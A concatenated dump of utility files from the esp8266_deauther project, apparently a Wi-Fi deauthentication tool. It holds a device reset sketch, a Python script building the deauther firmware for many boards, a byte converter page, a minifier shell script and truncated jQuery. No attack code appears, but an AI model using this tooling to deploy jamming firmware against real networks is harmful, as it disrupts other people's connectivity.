void toggle(uint8_t pin);
private:
uint16_t data;
uint16_t pinModeMask;
};
}
#endif // ifndef SimpleButton_PCF8575_h |
Markdown | esp8266_deauther-2/Reset_Sketch/README.md | # RESET
## Method 1
Open the Reset_Sketch.ino and upload with the correct settings.
## Method 2
Flash one of the `reset_` files.
## Method 3
Flash the `blank_1MB.bin` to 0x000000 for 1MB modules.
Flash it to 0x000000, 0x100000, 0x200000 and 0x300000 for 4MB modules. |
esp8266_deauther-2/Reset_Sketch/Reset_Sketch.ino | #include <EEPROM.h>
#include <LittleFS.h>
/*
Upload this sketch to your ESP8266 to erase
- all files in the SPIFFS,
- all data in the EEPROM
- WiFi credentials (SSID, password)
Also overwrites the previous program with this one (obviously).
*/
void setup() {
Serial.begin(115200);
Serial.println();
Serial.println("STARTING...");
EEPROM.begin(4096);
Serial.println("EEPROM initialized");
for (int i = 0; i < 4096; ++i){
EEPROM.write(i,0x00);
}
Serial.println("EEPROM cleaned");
LittleFS.begin();
Serial.println("SPIFFS initialized");
LittleFS.format();
Serial.println("SPIFFS cleaned");
ESP.eraseConfig();
Serial.println("WiFi credentials erased");
Serial.println("DONE!");
delay(10000);
ESP.reset();
}
void loop() {
} |
|
Python | esp8266_deauther-2/utils/arduino-cli-compile.py | #!/usr/bin/env python3
# inside esp8266_deauther/esp8266_deauther
# call this script
# python3 ../utils/arduino-cli-compile.py 2.5.0
import subprocess
import os
import sys
boards = [
"NODEMCU",
"WEMOS_D1_MINI",
"HACKHELD_VEGA",
"MALTRONICS",
"DISPLAY_EXAMPLE_I2C",
"DISPLAY_EXAMPLE_SPI",
"DSTIKE_DEAUTHER_V1",
"DSTIKE_DEAUTHER_V2",
"DSTIKE_DEAUTHER_V3",
"DSTIKE_DEAUTHER_V3_5",
"DSTIKE_D_DUINO_B_V5_LED_RING",
"DSTIKE_DEAUTHER_BOY",
"DSTIKE_NODEMCU_07",
"DSTIKE_NODEMCU_07_V2",
"DSTIKE_DEAUTHER_OLED",
"DSTIKE_DEAUTHER_OLED_V1_5_S",
"DSTIKE_DEAUTHER_OLED_V1_5",
"DSTIKE_DEAUTHER_OLED_V2",
"DSTIKE_DEAUTHER_OLED_V2_5",
"DSTIKE_DEAUTHER_OLED_V3",
"DSTIKE_DEAUTHER_OLED_V3_5",
"DSTIKE_DEAUTHER_OLED_V4",
"DSTIKE_DEAUTHER_OLED_V5",
"DSTIKE_DEAUTHER_OLED_V6",
"DSTIKE_DEAUTHER_MOSTER",
"DSTIKE_DEAUTHER_MOSTER_V2",
"DSTIKE_DEAUTHER_MOSTER_V3",
"DSTIKE_DEAUTHER_MOSTER_V4",
"DSTIKE_DEAUTHER_MOSTER_V5",
"DSTIKE_USB_DEAUTHER",
"DSTIKE_USB_DEAUTHER_V2",
"DSTIKE_DEAUTHER_WATCH",
"DSTIKE_DEAUTHER_WATCH_V2",
"DSTIKE_DEAUTHER_MINI",
"DSTIKE_DEAUTHER_MINI_EVO",
"LYASI_7W_E27_LAMP",
"AVATAR_5W_E14_LAMP",
]
version = sys.argv[1]
folder = f"../build_{version}"
os.system(f"mkdir {folder}")
for board in boards:
print(f"Compiling {board}...", flush=True)
if os.path.exists(f"{folder}/esp8266_deauther_{version}_{board}.bin"):
print("Already compiled")
continue
os.system(f"arduino-cli cache clean")
command = f"arduino-cli compile --fqbn deauther:esp8266:generic --build-property \"build.extra_flags=-DESP8266 -D{board}\" --output-dir {folder}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
process.wait()
os.system(
f"mv {folder}/esp8266_deauther.ino.bin {folder}/esp8266_deauther_{version}_{board}.bin")
print(f"OK")
os.system(f"rm {folder}/esp8266_deauther.ino.elf")
os.system(f"rm {folder}/esp8266_deauther.ino.map")
print("Finished :)") |
HTML | esp8266_deauther-2/utils/old_web_converter/converter.html | <!Doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Byte Converter</title>
<meta name="description" content="OConvert Text into Hex-Bytes">
<meta name="author" content="Spacehuhn - Stefan Kremser">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="style.css">
<script src="jquery-3.2.1.min.js"></script>
<style>
textarea{
width: 96%;
height: 350px;
}
</style>
</head>
<body>
<nav>
<a href="index.html">Converter</a>
<a href="https://github.com/spacehuhn" class="right">GitHub</a>
</nav>
<div class="container">
<div class="row">
<div class="col-12">
<h1 class="header">Text to Byte Array Converter</h1>
<p>
Please use <a href="https://htmlcompressor.com/compressor/" target="_blank">HTMLCompressor</a> (or something similar) first to get your HTML, CSS and JS minified.<br />
Every saved byte can improve the stability of the ESP8266's webserver!
</p>
</div>
</div>
<div class="row">
<div class="col-6">
<textarea id="input"></textarea>
</div>
<div class="col-6">
<textarea id="output" onclick="this.focus();this.select()" readonly="readonly"></textarea>
</div>
</div>
<div class="row">
<div class="col-12">
<button onclick="convert()" class="fullWidth button-primary">convert</button>
</div>
</div>
<div class="row">
<div class="col-12">
<p>Length: <span id="info_len">0</span> Bytes</p>
</div>
</div>
</div>
<script>
String.prototype.convertToHex = function (delim) {
return this.split("").map(function(c) {
return ("0" + c.charCodeAt(0).toString(16)).slice(-2);
}).join(delim || "");
};
function convert(){
var input = $('#input').val().convertToHex(",0x");
$('#output').val("0x"+input);
$('#info_len').html((input.match(new RegExp(",", "g")) || []).length + 1);
}
</script>
</body>
</html> |
Shell Script | esp8266_deauther-2/utils/old_web_converter/convert_all.sh | #!/bin/bash
#
# This script walks through the html folder and minify all JS, HTML and CSS files. It also generates
# the corresponding constants that is added to the data.h file on esp8266_deauther folder.
#
# @Author Erick B. Tedeschi < erickbt86 [at] gmail [dot] com >
#
outputfile="$(pwd)/data_h_temp"
rm $outputfile
function minify_html_css {
file=$1
curl -X POST -s --data-urlencode "input@$file" http://html-minifier.com/raw > /tmp/converter.temp
}
function minify_js {
file=$1
curl -X POST -s --data-urlencode "input@$file" https://javascript-minifier.com/raw > /tmp/converter.temp
}
function ascii2hexCstyle {
file_name=$(constFileName $1)
result=$(cat /tmp/converter.temp | hexdump -ve '1/1 "0x%.2x,"')
result=$(echo $result | sed 's/,$//')
echo "const char data_${file_name}[] PROGMEM = {$result};"
}
function constFileName {
extension=$(echo $1 | egrep -io "(css|js|html)$" | tr "[:lower:]" "[:upper:]")
file=$(echo $1 | sed 's/\.css//' | sed 's/\.html//' | sed 's/\.js//' | sed 's/\.\///' | tr '/' '_' | tr '.' '_')
echo $file$extension
}
cd html
file_list=$(find . -type f)
for file in $file_list; do
echo "Processing: $file"
if [[ "$file" == *.js ]]; then
echo "-> JS minifier"
minify_js $file
ascii2hexCstyle $file >> $outputfile
elif [[ "$file" == *.html ]] || [[ "$file" == *.css ]]; then
echo "-> HTML and CSS minifier"
minify_html_css $file
ascii2hexCstyle $file >> $outputfile
else
echo "-> without minifier"
cat $file > /tmp/converter.temp
ascii2hexCstyle $file >> $outputfile
fi
sleep 1
done |
JavaScript | esp8266_deauther-2/utils/old_web_converter/jquery-3.2.1.min.js | /*! jQuery v3.2.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(f.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(a<0?b:0);return this.pushStack(c>=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||r.isFunction(g)||(g={}),h===i&&(g=this,h--);h<i;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(r.isPlainObject(d)||(e=Array.isArray(d)))?(e?(e=!1,f=c&&Array.isArray(c)?c:[]):f=c&&r.isPlainObject(c)?c:{},g[b]=r.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},r.extend({expando:"jQuery"+(q+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===r.type(a)},isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=r.type(a);return("number"===b||"string"===b)&&!isNaN(a-parseFloat(a))},isPlainObject:function(a){var b,c;return!(!a||"[object Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?j[k.call(a)]||"object":typeof a},globalEval:function(a){p(a)},camelCase:function(a){return a.replace(t,"ms-").replace(u,v)},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(s,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(w(Object(a))?r.merge(c,"string"==typeof a?[a]:a):h.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:i.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;d<c;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;f<g;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,f=0,h=[];if(w(a))for(d=a.length;f<d;f++)e=b(a[f],f,c),null!=e&&h.push(e);else for(f in a)e=b(a[f],f,c),null!=e&&h.push(e);return g.apply([],h)},guid:1,proxy:function(a,b){var c,d,e;if("string"==typeof b&&(c=a[b],b=a,a=c),r.isFunction(a))return d=f.call(arguments,2),e=function(){return a.apply(b||this,d.concat(f.call(arguments)))},e.guid=a.guid=a.guid||r.guid++,e},now:Date.now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"length"in a&&a.length,c=r.type(a);return"function"!==c&&!r.isWindow(a)&&("array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.push,G=D.push,H=D.slice,I=function(a,b){for(var c=0,d=a.length;c<d;c++)if(a[c]===b)return c;return-1},J="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",K="[\\x20\\t\\r\\n\\f]",L="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",M="\\["+K+"*("+L+")(?:"+K+"*([*^$|!~]?=)"+K+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+L+"))|)"+K+"*\\]",N=":("+L+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+M+")*)|.*)\\)|)",O=new RegExp(K+"+","g"),P=new RegExp("^"+K+"+|((?:^|[^\\\\])(?:\\\\.)*)"+K+"+$","g"),Q=new RegExp("^"+K+"*,"+K+"*"),R=new RegExp("^"+K+"*([>+~]|"+K+")"+K+"*"),S=new RegExp("="+K+"*([^\\]'\"]*?)"+K+"*\\]","g"),T=new RegExp(N),U=new RegExp("^"+L+"$"),V={ID:new RegExp("^#("+L+")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K+"*\\)|)","i"),bool:new RegExp("^(?:"+J+")$","i"),needsContext:new RegExp("^"+K+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+K+"*((?:-\\d)?\\d*)"+K+"*\\)|)(?=[^-]|$)","i")},W=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da-f]{1,6}"+K+"?|("+K+")|.)","ig"),aa=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:d<0?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)},ba=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ca=function(a,b){return b?"\0"===a?"\ufffd":a.slice(0,-1)+"\\"+a.charCodeAt(a.length-1).toString(16)+" ":"\\"+a},da=function(){m()},ea=ta(function(a){return a.disabled===!0&&("form"in a||"label"in a)},{dir:"parentNode",next:"legend"});try{G.apply(D=H.call(v.childNodes),v.childNodes),D[v.childNodes.length].nodeType}catch(fa){G={apply:D.length?function(a,b){F.apply(a,H.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function ga(a,b,d,e){var f,h,j,k,l,o,r,s=b&&b.ownerDocument,w=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==w&&9!==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push(j),d}else{if(l[2])return G.apply(d,b.getElementsByTagName(a)),d;if((f=l[3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q||!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.setAttribute("id",k=u),o=g(a),h=o.length;while(h--)o[h]="#"+k+" "+sa(o[h]);r=o.join(","),s=$.test(a)&&qa(b.parentNode)||b}if(r)try{return G.apply(d,s.querySelectorAll(r)),d}catch(x){}finally{k===u&&b.removeAttribute("id")}}}return i(a.replace(P,"$1"),b,d,e)}function ha(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function ia(a){return a[u]=!0,a}function ja(a){var b=n.createElement("fieldset");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function ka(a,b){var c=a.split("|"),e=c.length;while(e--)d.attrHandle[c[e]]=b}function la(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&a.sourceIndex-b.sourceIndex;if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.parentNode&&b.disabled===!1?"label"in b?"label"in b.parentNode?b.parentNode.disabled===a:b.disabled===a:b.isDisabled===a||b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function qa(a){return a&&"undefined"!=typeof a.getElementsByTagName&&a}c=ga.support={},f=ga.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return!!b&&"HTML"!==b.nodeName},m=ga.setDocument=function(a){var b,e,g=a?a.ownerDocument||a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=n.documentElement,p=!f(n),v!==n&&(e=n.defaultView)&&e.top!==e&&(e.addEventListener?e.addEventListener("unload",da,!1):e.attachEvent&&e.attachEvent("onunload",da)),c.attributes=ja(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ja(function(a){return a.appendChild(n.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=Y.test(n.getElementsByClassName),c.getById=ja(function(a){return o.appendChild(a).id=u,!n.getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}}):(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value===a)return[f];e=b.getElementsByName(a),d=0;while(f=e[d++])if(c=f.getAttributeNode("id"),c&&c.value===a)return[f]}return[]}}),d.find.TAG=c.getElementsByTagName?function(a,b){return"undefined"!=typeof b.getElementsByTagName?b.getElementsByTagName(a):c.qsa?b.querySelectorAll(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){if("undefined"!=typeof b.getElementsByClassName&&p)return b.getElementsByClassName(a)},r=[],q=[],(c.qsa=Y.test(n.querySelectorAll))&&(ja(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a><select id='"+u+"-\r\\' msallowcapture=''><option selected=''></option></select>",a.querySelectorAll("[msallowcapture^='']").length&&q.push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").length||q.push(".#.+[+~]")}),ja(function(a){a.innerHTML="<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"*[*^$|!~]?="),2!==a.querySelectorAll(":enabled").length&&q.push(":enabled",":disabled"),o.appendChild(a).disabled=!0,2!==a.querySelectorAll(":disabled").length&&q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=Y.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ja(function(a){c.disconnectedMatch=s.call(a,"*"),s.call(a,"[s!='']:x"),r.push("!=",N)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=Y.test(o.compareDocumentPosition),t=b||Y.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===n||a.ownerDocument===v&&t(v,a)?-1:b===n||b.ownerDocument===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.unshift(c);c=b;while(c=c.parentNode)h.unshift(c);while(g[d]===h[d])d++;return d?la(g[d],h[d]):g[d]===v?-1:h[d]===v?1:0},n):n},ga.matches=function(a,b){return ga(a,null,null,b)},ga.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(S,"='$1']"),c.matchesSelector&&p&&!A[b+" "]&&(!r||!r.test(b))&&(!q||!q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return ga(b,n,null,[a]).length>0},ga.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},ga.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&C.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},ga.escape=function(a){return(a+"").replace(ba,ca)},ga.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},ga.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=ga.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=ga.selectors={cacheLength:50,createPseudo:ia,match:V,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(_,aa),a[3]=(a[3]||a[4]||a[5]||"").replace(_,aa),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||ga.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&ga.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return V.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&T.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(_,aa).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+K+")"+a+"("+K+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||"undefined"!=typeof a.getAttribute&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=ga.attr(d,a);return null==e?"!="===b:!b||(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e.replace(O," ")+" ").indexOf(c)>-1:"|="===b&&(e===c||e.slice(0,c.length+1)===c+"-"))}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h,t=!1;if(q){if(f){while(p){m=b;while(m=m[p])if(h?m.nodeName.toLowerCase()===r:1===m.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){m=q,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n&&j[2],m=n&&q.childNodes[n];while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if(1===m.nodeType&&++t&&m===b){k[a]=[w,n,t];break}}else if(s&&(m=b,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n),t===!1)while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if((h?m.nodeName.toLowerCase()===r:1===m.nodeType)&&++t&&(s&&(l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d||t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||ga.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ia(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=I(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:ia(function(a){var b=[],c=[],d=h(a.replace(P,"$1"));return d[u]?ia(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),b[0]=null,!c.pop()}}),has:ia(function(a){return function(b){return ga(a,b).length>0}}),contains:ia(function(a){return a=a.replace(_,aa),function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:ia(function(a){return U.test(a||"")||ga.error("unsupported lang: "+a),a=a.replace(_,aa).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:oa(!1),disabled:oa(!0),checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return X.test(a.nodeName)},input:function(a){return W.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:pa(function(){return[0]}),last:pa(function(a,b){return[b-1]}),eq:pa(function(a,b,c){return[c<0?c+b:c]}),even:pa(function(a,b){for(var c=0;c<b;c+=2)a.push(c);return a}),odd:pa(function(a,b){for(var c=1;c<b;c+=2)a.push(c);return a}),lt:pa(function(a,b,c){for(var d=c<0?c+b:c;--d>=0;)a.push(d);return a}),gt:pa(function(a,b,c){for(var d=c<0?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=ma(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=na(b);function ra(){}ra.prototype=d.filters=d.pseudos,d.setFilters=new ra,g=ga.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){c&&!(e=Q.exec(h))||(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=R.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(P," ")}),h=h.slice(c.length));for(g in d.filter)!(e=V[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?ga.error(a):z(a,i).slice(0)};function sa(a){for(var b=0,c=a.length,d="";b<c;b++)d+=a[b].value;return d}function ta(a,b,c){var d=b.dir,e=b.next,f=e||d,g=c&&"parentNode"===f,h=x++;return b.first?function(b,c,e){while(b=b[d])if(1===b.nodeType||g)return a(b,c,e);return!1}:function(b,c,i){var j,k,l,m=[w,h];if(i){while(b=b[d])if((1===b.nodeType||g)&&a(b,c,i))return!0}else 